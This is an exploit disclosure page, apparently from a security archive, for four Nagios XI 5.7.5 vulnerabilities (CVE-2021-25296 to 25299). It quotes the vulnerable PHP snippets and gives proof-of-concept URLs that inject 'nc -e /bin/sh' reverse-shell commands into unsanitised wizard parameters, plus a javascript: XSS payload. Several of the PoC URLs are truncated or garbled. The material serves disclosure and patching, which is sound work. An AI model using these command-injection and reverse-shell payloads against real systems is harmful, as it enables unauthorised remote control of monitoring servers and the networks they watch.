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File Tags

ActiveX (932)
 Advisory (79,754)
 Arbitrary (15,694)
 BBS (2,859)
 Bypass (1,619)
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 Code Execution (8,926)
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 JavaScript (821)
 Kernel (6,291)
 Local (14,201)
 Magazine (586)
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 PHP (5,093)
 Proof of Concept (2,291)
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Systems

AIX (426)
 Apple (1,926)
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 Cisco (1,917)
 Debian (6,634)
 Fedora (1,600)
 FreeBSD (1,242)
 Gentoo (4,272)
 HPUX (878)
 IOS (330)
 iPhone (108)
 IRIX (220)
 Juniper (67)
 Linux (44,315)
 Mac OS X (684)
 Mandriva (3,105)
 NetBSD (255)
 OpenBSD (479)
 RedHat (12,469)
 Slackware (941)
 Solaris (1,607)

Nagios XI 5.7.5 Remote Code Execution

Authored by [fs0c-sh](#) | Site [github.com](#)

Posted Feb 26, 2021

Nagios XI version 5.7.5 suffers from a cross site scripting and multiple remote code execution vulnerabilities.

tags | [exploit](#), [remote](#), [code execution](#)

advisories | [CVE-2021-25296](#), [CVE-2021-25297](#), [CVE-2021-25298](#), [CVE-2021-25299](#)

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```

# nagios-xi-5.7.5-bugs
Bugs reported to Nagios XI

## CVE-2021-25296

### Code Location

`/usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php`

### Code snippet

```php
if (!empty($plugin_output_len)) {
 $disk_wmi_command .= " --forcetruncateoutput " . $plugin_output_len;
 $service_wmi_command .= " --forcetruncateoutput " . $plugin_output_len;
 $process_wmi_command .= " --forcetruncateoutput " . $plugin_output_len;
}

echo $disk_wmi_command;
// Run the WMI plugin to get realtime info
exec($disk_wmi_command, $disk_output, $disk_return_var);
exec($service_wmi_command, $service_output, $service_return_var);
exec($process_wmi_command, $process_output, $process_return_var);

POC (Works with admin/non-admin authentication)

https://10.0.2.15/nagiosxi/config/monitoringwizard.php?
update=1&nsip=50c0f98fe9018dc43c81672adlaeed5fd3f9710f013381519e553f846b5c2a86&nextstep=3&wizard=windowswmi&chec
nc -e /bin/sh 127.0.0.1 4444;$submitButton2=

The `plugin_output_len` variable here is not sanitized and can give `command execution`. Eg:
`plugin_output_len=1024; nc -e /bin/sh 127.0.0.1 4444;`

CVE-2021-25297

Code Location

`/usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php`

Code Snippet

```php
function switch_configwizard_add_cfg_to_mrtg($address)
{
    // get the data that we need
    $mrtg_conf_dir = "/etc/mrtg/conf.d";
    echo $address;
    $mrtg_cfg_file = "{$address}.cfg";
    $absolute_mrtg_cfg_file = "{$mrtg_conf_dir}/{$mrtg_cfg_file}";
    $cfgmaker_file = switch_configwizard_get_walk_file($address);
    // check if the file already exists for useful debugging
    $mrtg_conf_contents = scandir($mrtg_conf_dir);
    echo "REACHED HERE1";
    if (in_array($mrtg_cfg_file, $mrtg_conf_contents)) {
        debug("{$mrtg_cfg_file} exists in {$mrtg_conf_dir}, overwriting");
    } else {
        debug("{$mrtg_cfg_file} does not exist in {$mrtg_conf_dir}, creating");
    }
    echo "REACHED HERE2";
    // copy the cfgmaker file to the mrtg cfg destination
    echo $cfgmaker_file;
    echo $absolute_mrtg_cfg_file;
    if (!copy($cfgmaker_file, $absolute_mrtg_cfg_file)) {
        debug("Unable to copy from {$cfgmaker_file} to {$absolute_mrtg_cfg_file}");
        return false;
    }
    echo "REACHED HERE3";
    echo $absolute_mrtg_cfg_file;
    // add some meta info to the file
    $infofile = "### ADDED BY NAGIOSXI (User: ". get_user_attr(0, 'username') .", DATE: ".
get_datetime_string(time()).") ###\n";
    exec("sed -i '1s|.*/|{$infofile}|' $absolute_mrtg_cfg_file");

    return true;
}
...

### POC (Works with admin/non-admin authentication)
...
https://10.0.2.15/nagiosxi/config/monitoringwizard.php?
update=1&nsip=4ef78ca5c24c7c526dc86b23092b81c3231a7bf59e1eb67f9918b8daf7b6de9&nextstep=3&wizard=switch&ip_adddre
=e /bin/sh 127.0.0.1
4445;$port=161&snmpversion=2c&snmpopts=5$Sanmpcommunity=5D=public&snmpopts=5Bv3_security_level=5D=authPriv&snmpoj
...

The `ip_address` variable here is not sanitized and can give `command execution`. Eg: `ip_address=1024; nc -e
/bin/sh 127.0.0.1 4444;`

## CVE-2021-25298

### Code path

`/usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php`

### Code Snippet

```php
case CONFIGWIZARD_MODE_GETSTAGE2HTML:

 // echo ("reached here =====");
 // Get variables that were passed to us
 $address = grab_array_var($inargs, "ip_address", ""); // [User input]
 $port = grab_array_var($inargs, "port", "");
 $token = grab_array_var($inargs, "token", "");
 $no_asl_verify = grab_array_var($inargs, "no_asl_verify", 1);
 $hostname = grab_array_var($inargs, 'hostname', gethostbyaddr($address));
 $default_mem_units = grab_array_var($inargs, 'default_mem_units', 'Gi');
 $top_check_port = grab_array_var($inargs, 'top_check_port', '5693');
 $rp_address = nagiosoccm_replace_user_macros($address);
 $rp_port = nagiosoccm_replace_user_macros($port);
 $rp_token = nagiosoccm_replace_user_macros($token);
 $services_serial = grab_array_var($inargs, "services_serial", "");
 if ($services_serial) {
 $services = unserialize(base64_decode($services_serial));
 }
 // echo $rp_address;
 $not_used = array();
 $return_code = 0;
 $alternative_host_check = false;

```

```
... exec('ping -W 2 -c 1 ' . $rp_address, $not_used, $return_code); // [Bug here]

... ### POC (Works with admin/non-admin authentication)
...
https://10.0.2.15/nagiosxi/config/monitoringwizard.php?
update=1&ns=e2401df06a3892ba612df20e1ce2f559d7647c4b5fcbaf7f64c23c0ea9df1564f&nextstep=4&wizard=digitalocean&no
-e /bin/sh 127.0.0.1 4445;$port=5693;$token=123&submitButton2=
...

The 'ip_address' variable here is not sanitized and can give 'command execution'. Eg: `ip_address=1024; nc -e
/bin/sh 127.0.0.1 4444;`

CVE-2021-25299
Code Location
`/usr/local/nagiosxi/html/admin/sshterm.php`
Code Snippet
...php+HTML
<?php if ($se) { ?>
<iframe src="<?php echo $url; ?>" style="width: 50%; min-width: 600px; height: 500px;"></iframe>
<?php } else { ?>
<div style="color: #FFF; font-size: 14px; font-family: consolas, courier-new; background-color: #000;
padding: 2px 6px; overflow-y: scroll; width: 50%; min-width: 600px; height: 500px;">Enterprise features must be
enabled</div>
<?php
}
...

POC
`https://10.0.2.15/nagiosxi/admin/sshterm.php?url=javascript:alert(1)`

The 'url' variable is not sanitized and can give 'xss' .
```

- Spoof (2,166)

SQL Injection (16,102)

TCP (2,379)

Trojan (686)

UDP (676)

Virus (662)

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x86 (946)

XSS (17,494)

Other
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Other

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